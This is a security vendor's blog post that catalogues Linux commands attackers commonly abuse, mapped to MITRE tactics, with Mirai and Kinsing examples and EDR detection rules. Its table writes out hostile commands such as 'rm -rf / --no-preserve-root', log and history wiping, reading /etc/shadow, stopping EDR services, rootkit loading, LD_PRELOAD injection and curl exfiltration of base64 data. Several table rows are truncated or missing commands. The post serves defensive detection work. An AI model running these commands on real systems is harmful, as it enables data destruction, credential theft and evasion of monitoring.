Skip to content
Request Your Demo
    May 7, 2021

    Linux Commands and Utilities Commonly Used by Attackers

    Uptycs' threat research team has observed several instances of Linux malware where the attackers leverage the inbuilt commands and utilities for a wide range of malicious activities.
    In this post, we’ll take a look at the Linux commands and utilities commonly used by attackers and how you can use Uptycs EDR detection capabilities  to find if these have been used in your environment.


    What is Linux?

    Around since the mid-1990s and now spanning the globe, Linux is an operating system running most of the internet, all of the world’s top 500 supercomputers, the world’s stock exchanges, and in most phones, thermostats, cars, refrigerators, roku devices, and televisions. A platform of choice and adjacent to iOS and Mac OS, Linux has been deemed the most reliable, secure, and worry-free operating systems to run desktops, servers, and embedded systems across the globe available. An example of Linux’s technological reach, Android’s platform is powered by the Linux operating system. 

    Comprised of sections including bootloader, kernels, init systems, daemons, graphical server, desktop environments, and applications, the Linux operating system is ultimately chosen for it’s seamlessness in battling viruses, malware, slow run time, crashes, costly repairs, and licensing fees, posited as one of the most reliable computer ecosystems on the planet - and with zero cost of entry.


    What is A Linux Command?

    A program or utility that runs on the command line, a Linux command is a directive to an interface (command line) that accepts lines of text and processes them into instructions for your computer. Any graphical user interface (GUI) is just an abstraction of common-line programs.


    5 Linux Command Examples

    Pwd Command - The pwd command is used to display the location of the current working director

    Mkdir Command - The mkdir command is used to create a new directory under any directory

    rmdir Command - The rmdir command is used to delete a directory. 

    Is Command - The Is command is used to display a list of content of a directory

    cd Command - The cd command is used to change the current directory. 



    In Linux, several utilities and commands are configured by default. Once an adversary gains access to the system, they can leverage these commands and utilities to get their malware up and loaded quickly with full system privileges. And since these commands and utilities are used by users on a daily basis, it can be extremely difficult to detect malicious activities if they have been used for malicious purposes.
    Using the data sources from customer telemetry, MITRE mapping of the detection alerts, threat intelligence systems and our in-house osquery-based sandbox, we identified around 25 commands and utilities that are most commonly used by attackers.

    Uptycs EDR has detected and identified malware abusing these commands and utilities using the following MITRE tactics:

    1. Command and Control
    2. Persistence
    3. Privilege Escalation
    4. Defense Evasion
    5. Discovery

    We drill down and take a closer look at a few examples in the table below.


    To learn more about the latest threat research conducted by the Uptycs Team, check out our most recent threat bulletin 


    Linux Commands and Utilities Used By Attackers

    Using Uptycs EDR, we discovered the Linux commands most commonly used by attackers and mapped them to the techniques and tactics used by bad actors. Below is a list of commonly exploited commands and utilities.

    Command / Utility





    Remote System Discovery


    arp -a


    System Owner/User Discovery




    System Network Connections Discovery Linux


    netstat -plntu


    List OS Information


    uname -a


    Enumerate users and groups




    Packet Capture Linux


    tcpdump -n > output

    LD_PRELOAD=#{path_to_shared_library} ls

    Shared Library Injection via LD_PRELOAD

    Persistence, Privilege Escalation, Defense Evasion

    LD_PRELOAD=”/tmp/” /bin/ls


    Loadable Kernel Module based Rootkit


    sudo insmod rootkit.ko


    Loadable Kernel Module based Rootkit


    sudo modprobe -r rootkit.ko


    Create a user account on a Linux System


    useradd –g 500 –u 500 –s /usr/local/bin/nocando –d /var/spool/vmail


    Schedule task/Job using cron


    crontab -


    Delete Filesystem - Linux

    Delete Log Files


    rm -rf / --no-preserve-root

    rm -rf /var/logs


    Kill EDR processes


    kill -9 1234


    Linux VM Check via Kernel Modules

    Defense evasion

    sudo lsmod | grep -i "vboxsf\|vboxguest"


    Stop edr services on Linux

    Defense evasion

    systemctl stop daemon


    Malicious User Agents

    Command and Control

    curl -XPOST #{base64_data}.#{destination_url}


    Ingress Tool Transfer

    Command and Control

    wget http://{IP}:1337/


    File attributes/permissions modification

    Defense Evasion

    chattr -i /etc/


    Access /etc/shadow (Local)

    Persistence, Credential Access

    sudo cat /etc/shadow > file


    Access /etc/passwd (Local)

    Enumerate all accounts


    cat /etc/passwd > file


    Clear Bash history

    Access Bash history

    Credential Access, Defense Evasion

    echo “” > ~/.bash_history


    View sudoers access

    Privilege Escalation

    vim /etc/sudoers


    .bash_profile and .bashrc


    echo “/tmp/qwer” >> ~/.bashrc


    .bash_profile and .bashrc


    echo “/tmp/qwer” >> ~/.bash_profile


    Hijack Execution Flow

    Persistence, Privilege Escalation, Defense Evasion

    echo “/tmp/” >> /etc/

    Table: Commonly exploited Linux commands/utilities

    Request An In-Person Meeting at KubeCon

    Malware Tactics Using Linux Commands

    Here’s a closer look at some of the most recent and commonly seen malware using the above commands and utilities.


    Tactic: CnC and Execution

    Malware: Mirai

    Usage : Commands like wget and curl are most widely seen to download and execute other pieces of malware

    Mirai is a malware that turns networked devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks. In the attack kill chain, the adversary downloads the initial shell script on the target system which then executes wget and curl to drop the Mirai binaries for different architectures and executes them. (See Figure 1)

    Mirai malware executing wget and curl activities.Figure 1: Mirai malware executing wget and curl activities. (Click to see larger version.)

    Uptycs EDR detected the curl and wget activities performed by the malware and also the process activity of Mirai. (See Figure 2)

    Uptycs Detection for wget and curl activities by Mirai.Figure 2: Uptycs Detection for wget and curl activities by Mirai. (Click to see larger version.)


    Tactic: Persistence, Defense Evasion

    Malware: Kinsing

    Usage: For persistence and defence evasion mechanism, we have seen adversaries of Kinsing abusing commands like crontab, chattr, or rm and modifying files like ~/.bash_history, /etc/

    Kinsing is a malware that targets misconfigured Docker services and infects them to run crypto miners. The initial phase of the malware is to download and execute the shell script which then modifies /etc/ and also executes crontab for achieving persistence. (See Figure 3 and 4)

    Kinsing modifying /etc/ 3: Kinsing modifying /etc/

    Kinsing adding cron job for persistence. Figure 4: Kinsing adding cron job for persistence. 

    Uptycs EDR detected the Kinsing malware executing crontab and chattr commands for persistence and defense evasion. (See Figure 5)

    Uptycs Detection for Kinsing malware.Figure 5: Uptycs Detection for Kinsing malware. (Click to see larger version.)

    In addition to the linux commands and utilities used by Mirai and Kinsing, Uptycs EDR also labelled the threat using process scanning with 10/10 risk score.


    Tactic: Discovery

    Most Linux servers are used for hosting services mostly using SSH. If SSH is not configured properly, the adversaries may gain access into servers using various techniques like exploiting weak credentials. Once the adversaries get access to the target system, their initial goal is to extract system information for further stages like Exploitation, Privilege Escalation or Persistence. Commands like uname, users, groups, netstat, etc. are most commonly used for initial investigation.

    Uptycs EDR detects all the post activities after successful SSH login on our target system. (See Figure 6)

    Uptycs Detection for Discovery Techniques.Figure 6: Uptycs Detection for Discovery Techniques. (Click to see larger version.)


    To learn more about the latest threat research conducted by the Uptycs Team, check out our most recent threat bulletin 



    By exploiting Linux commands that are used for daily operations, it’s possible that their use for malicious activities are often left unnoticed and stay under the radar. Linux Enterprise administrators should regularly monitor the list of the most commonly used commands in the list above for any suspicious/malicious activities in the system. Current Uptycs customers can see a full list of Event Rules below.

    Not currently using Uptycs? Check out this short demo to learn a little more about how we can help solve your key Linux security challenges, 

    Watch A 15-Minute Demo!


    Event Rules for Uptycs Customers

    The following Uptycs EDR rules are already available to customers to detect above mentioned techniques:

    • Process using ifconfig, ip or arp to get the network configuration - T1016 Discovery under Discovery for Linux
    • Process using who or users utility to get users information - T1033 Discovery under Discovery for Linux
    • Suspicious tool tcpdump launched to capture network traffic - T1040 Discovery for Linux
    • Detected use of curl utility to download file from internet - T1105 Command and Control for Linux
    • Process using groups utility to get group policies - T1069.002 Discovery for Linux
    • Process or script trying to get system information - T1082 System Information Discovery under Discovery for Linux
    • Useradd utility launched to create user account - T1136 Persistence for Linux
    • Detected use of LD_PRELOAD - Likely code injection - T1574.006 Hijack Execution for Linux
    • Scheduled Task by Cron - T1053.003 Persistence_LINUX
    • Process trying to access /etc/ file for persistence - T1055.001 Defense Evasion for Linux
    • Suspicious use of wget to download file in tmp directory - T1105 Command and Control for Linux
    • Process trying to access or modify OS credentials - T1003.008 Credential Access Linux
    • Process trying to access bash history - T1552.003 Credential Access for Linux
      bash_profile or .bashrc file modification - T1156.004 Persistence for Linux
    • Process trying to access /etc/ file for persistence - T1055.001 Defense Evasion for Linux
    • Create or Modify Systemd Service- T1543.002 Persistence_LINUX
    • Data deletion using rm -rf detected - T1485 Impact for Linux
    • Process trying to access /etc/passwd file - T1087.001 Discovery for Linux
    • Process trying to access /etc/sudoers file - T1548.003 Privilege Escalation for Linux
    • Process using crontab utility to add entries in cron jobs - T1053.003 Execution for Linux


    Pritam Salunkhe

    Pritam Salunkhe works as Security Researcher at Uptycs. His expertise is in Malware Analysis and Reverse Engineering. He has a keen interest in programming and building tools for defensive purpose.

    Other posts you might be interested in